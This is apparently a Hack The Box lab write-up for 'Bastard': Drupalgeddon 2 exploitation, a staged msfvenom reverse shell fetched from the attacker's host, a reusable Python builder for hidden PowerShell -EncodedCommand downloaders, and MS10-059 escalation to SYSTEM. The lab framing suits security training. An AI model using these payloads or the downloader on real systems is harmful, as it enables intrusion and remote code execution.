Bastard

OS: Windows, Difficulty: Medium, IP: 10.10.10.9

Initial Enumeration

# Nmap 7.70 scan initiated Sat Jul 20 22:32:11 2019 as: nmap -sV -sC -O -A -p 80,135,49154 -oN O-detailed 10.10.10.9
Nmap scan report for 10.10.10.9
Host is up (0.25s latency).

PORT      STATE SERVICE VERSION
80/tcp    open  http    Microsoft IIS httpd 7.5
|_http-generator: Drupal 7 (http://drupal.org)
| http-methods:
|_  Potentially risky methods: TRACE
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt
|_/LICENSE.txt /MAINTAINERS.txt
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Welcome to 10.10.10.9 | 10.10.10.9
135/tcp   open  msrpc   Microsoft Windows RPC
49154/tcp open  msrpc   Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|phone|specialized
Running (JUST GUESSING): Microsoft Windows 8|Phone|2008|7|8.1|Vista|2012 (92%)
OS CPE: cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_8.1 cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1 cpe:/o:microsoft:windows_server_2012
Aggressive OS guesses: Microsoft Windows 8.1 Update 1 (92%), Microsoft Windows Phone 7.5 or 8.0 (92%), Microsoft Windows 7 or Windows Server 2008 R2 (91%), Microsoft Windows Server 2008 R2 (91%), Microsoft Windows Server 2008 R2 or Windows 8.1 (91%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (91%), Microsoft Windows 7 (91%), Microsoft Windows 7 Professional or Windows 8 (91%), Microsoft Windows 7 SP1 or Windows Server 2008 R2 (91%), Microsoft Windows 7 SP1 or Windows Server 2008 SP2 or 2008 R2 SP1 (91%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

TRACEROUTE (using port 80/tcp)
HOP RTT       ADDRESS
1   251.65 ms 10.10.14.1
2   251.68 ms 10.10.10.9

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Jul 20 22:33:23 2019 -- 1 IP address (1 host up) scanned in 72.34 seconds

Drupal CVEs

Exploited CVE: CVE-2018-7600 (Drupalgeddon 2, Drupal 7 remote code execution)

msfvenom -p windows/shell/reverse_tcp LHOST=10.10.14.8 LPORT=9999 -f exe > exploit_rev.exe

Created a simple staged reverse shell (windows/shell/reverse_tcp) to be delivered to the machine. The binary is served over HTTP from the attacking box as syst.exe in the commands below.

Create a PS1 file that will download my exploit to the system. Each stage is a separate command run through the Drupalgeddon 2 primitive, and the file lands in the directory the web server runs the command from (the Drupal web root, as the later shell prompt shows).
-----------------
./drupa7-CVE-2018-7600.py http://10.10.10.9 -c 'cmd.exe /c "@echo $webclient = New-Object System.Net.WebClient>wget.ps1&@echo $url = "http://10.10.14.8/syst.exe">>wget.ps1&@echo $file = "syst.exe">>wget.ps1&@echo $webclient.DownloadFile($url,$file)>>wget.ps1&@type wget.ps1"'

Execute the PS1 file to actually download the exploit (-ExecutionPolicy Bypass is needed because script execution is restricted by default)
-----------------
./drupa7-CVE-2018-7600.py http://10.10.10.9 -c 'powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1'

Execute the downloaded exploit
-----------------
./drupa7-CVE-2018-7600.py http://10.10.10.9 -c 'syst.exe'

I caught this reverse shell with Metasploit's exploit/multi/handler. Since windows/shell/reverse_tcp is a staged payload, the handler has to be configured with the same payload, LHOST and LPORT as the msfvenom run, otherwise the stage is never sent and the connection just drops.
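The three-hop delivery above works, but every injected command has to survive cmd.exe's handling of quotes, `>` and `&`, which is where most of the tedium comes from. The following is an added example (my own code, not from the original write-up or the exploit script) of collapsing the downloader into a single injected command by handing PowerShell a Base64-encoded UTF-16LE script via -EncodedCommand, so the payload contains no cmd.exe metacharacters at all. The URL, file name and the detached Start-Process step are assumptions for the demonstration; the page's own values are http://10.10.14.8/syst.exe and syst.exe.

```python
"""One-shot PowerShell downloader for a command-injection primitive.

Added example, not code from the original write-up. PowerShell's
-EncodedCommand takes Base64 of the script's UTF-16LE bytes, so the whole
downloader becomes a single token with no characters that cmd.exe parses.
URL and file name below are assumed values for the demo.
"""
import base64
import re

# Plain file names only: no path separators, no quotes, nothing cmd.exe
# or PowerShell would interpret.
SAFE_NAME = re.compile(r"^[A-Za-z0-9_.-]+$")

# Characters cmd.exe gives special meaning to; the final command must
# contain none of them or the injection breaks on the first hop.
CMD_METACHARS = set('"&|<>^%')


def build_downloader_script(url: str, dest: str) -> str:
    """PowerShell that downloads url to dest in the current directory and
    starts it detached, so the HTTP request carrying the injection returns
    instead of hanging for the lifetime of the payload."""
    if "'" in url:
        raise ValueError("a single quote would end the PowerShell literal")
    if not SAFE_NAME.match(dest):
        raise ValueError("dest must be a plain file name")
    return (
        "$wc = New-Object System.Net.WebClient\n"
        f"$wc.DownloadFile('{url}', (Join-Path $PWD.Path '{dest}'))\n"
        f"Start-Process -FilePath (Join-Path $PWD.Path '{dest}')\n"
    )


def encode_command(script: str) -> str:
    """Base64 of the UTF-16LE script, exactly what -EncodedCommand expects.
    Encoding as UTF-8 is the classic mistake: PowerShell decodes garbage."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_command(encoded: str) -> str:
    """Inverse of encode_command, to check what the target will run."""
    return base64.b64decode(encoded).decode("utf-16-le")


def build_injection_command(url: str, dest: str) -> str:
    """The string handed to the exploit's -c option: one powershell.exe
    invocation, no nested quoting, no redirection operators."""
    encoded = encode_command(build_downloader_script(url, dest))
    cmd = (
        "powershell.exe -NoProfile -NonInteractive -WindowStyle Hidden "
        f"-ExecutionPolicy Bypass -EncodedCommand {encoded}"
    )
    leaked = CMD_METACHARS.intersection(cmd)
    if leaked:  # impossible with the Base64 alphabet, but keep the claim checked
        raise AssertionError(f"cmd.exe metacharacters leaked: {sorted(leaked)}")
    return cmd


if __name__ == "__main__":
    # Constructed values for the demo (the page used 10.10.14.8 / syst.exe).
    one_shot = build_injection_command("http://10.10.14.8/syst.exe", "syst.exe")
    print(one_shot)
    # Show what the target will decode and execute.
    print(decode_command(one_shot.split("-EncodedCommand ", 1)[1]))
```

The output of build_injection_command is what goes in the exploit script's -c argument in place of the three separate commands. The Base64 form is about 8/3 the size of the raw script, so keep the downloader short if the injection vector has a length limit.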

Ran systeminfo on the target and fed the output to Windows Exploit Suggester, which compares the installed hotfixes against the Microsoft bulletin database offline. With 0 hotfixes reported, the candidate list is long and most entries need to be tried before one works.

./wes.py -d 2019-07-21-mssb.xls -i ../systeminfo | tee ../wes.out
[*] initiating winsploit version 3.3...
[*] database file detected as xls or xlsx based on extension
[*] attempting to read from the systeminfo input file
[+] systeminfo input file read successfully (ascii)
[*] querying database file for potential vulnerabilities
[*] comparing the 0 hotfix(es) against the 197 potential bulletins(s) with a database of 137 known exploits
[*] there are now 197 remaining vulns
[+] [E] exploitdb PoC, [M] Metasploit module, [*] missing bulletin
[+] windows version identified as 'Windows 2008 R2 64-bit'
[*]
[M] MS13-009: Cumulative Security Update for Internet Explorer (2792100) - Critical
[M] MS13-005: Vulnerability in Windows Kernel-Mode Driver Could Allow Elevation of Privilege (2778930) - Important
[E] MS12-037: Cumulative Security Update for Internet Explorer (2699988) - Critical
[*]   http://www.exploit-db.com/exploits/35273/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5., PoC
[*]   http://www.exploit-db.com/exploits/34815/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5.0 Bypass (MS12-037), PoC
[*]
[E] MS11-011: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (2393802) - Important
[M] MS10-073: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (981957) - Important
[M] MS10-061: Vulnerability in Print Spooler Service Could Allow Remote Code Execution (2347290) - Critical
[E] MS10-059: Vulnerabilities in the Tracing Feature for Services Could Allow Elevation of Privilege (982799) - Important
[E] MS10-047: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (981852) - Important
[M] MS10-002: Cumulative Security Update for Internet Explorer (978207) - Critical
[M] MS09-072: Cumulative Security Update for Internet Explorer (976325) - Critical
[*] done

Only MS10-059 seemed to work, so I used the earlier-mentioned way to deliver the exploit binary and ran it to get a shell as NT AUTHORITY\SYSTEM. This was a reverse-shell exploit (the public MS10-059 PoC, commonly known as Chimichurri, takes a listener IP and port and connects back), so I had to catch it with nc rather than the Metasploit handler.

nc -lvnp 8989
listening on [any] 8989 ...
connect to [10.10.14.8] from (UNKNOWN) [10.10.10.9] 49519
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\inetpub\drupal-7.54>whoami
whoami
nt authority\system

User Own

C:\Users\dimitris\Desktop>type user.txt
type user.txt
ba22f***

Root Own

C:\Users\Administrator\Desktop>type root.txt.txt                                                                                                       
type root.txt.txt                                                                                                                                      
4bf12***

Learning Outcome

Delivering exploits, downloaders or anything else is a very tedious task if you do not have a Meterpreter (staged) shell. Apart from that, exploit reliability is very finicky. Overall a good box; it made me think a little about exploit delivery and session management.
